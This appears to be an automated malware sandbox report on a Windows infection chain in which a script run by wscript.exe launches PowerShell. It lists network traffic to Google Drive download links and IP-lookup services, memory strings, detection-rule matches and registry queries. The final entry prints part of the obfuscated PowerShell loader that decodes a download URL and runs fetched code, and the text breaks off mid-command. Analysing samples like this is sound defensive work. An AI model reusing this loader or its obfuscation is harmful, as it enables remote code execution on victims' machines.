Source: | Binary string: m.Core.pdb source: powershell.exe, 0000000D.00000002.1696029737.000000000864C000.00000004.00000020.00020000.00000000.sdmp
Source: | Binary string: ation.pdb source: powershell.exe, 0000000D.00000002.1692787336.00000000076A9000.00000004.00000020.00020000.00000000.sdmp
Source: | Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.1692787336.00000000076A9000.00000004.00000020.00020000.00000000.sdmp
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbpy source: powershell.exe, 0000000D.00000002.1696029737.000000000864C000.00000004.00000020.00020000.00000000.sdmp
Source: | Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.1692787336.00000000076A9000.00000004.00000020.00020000.00000000.sdmp
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download?id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download?id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: wscript.exe, 00000000.00000003.1241143349.0000027D583B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1240467877.0000027D583AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1353777806.0000027D5631F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1355322064.0000027D563A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.1355589517.0000027D582C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1353777806.0000027D5631F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1355322064.0000027D563A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabny?
Source: wscript.exe, 00000000.00000003.1241181890.0000027D58327000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241112385.0000027D58300000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0821666a6c
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000009.00000002.1857076954.000002421FCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1775276005.000002420FC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1687812642.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1775276005.000002420FC51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000009.00000002.1775276005.00000242116AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.000002420FE78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000009.00000002.1775276005.000002420FE78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsTP
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsTXR
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000009.00000002.1775276005.00000242100DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT&export=download
Source: powershell.exe, 00000009.00000002.1775276005.00000242100DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.comv
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1775276005.0000024210EEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1857076954.000002421FCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-u
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: amsi32_5480.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7868, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5480, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. 
';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPo |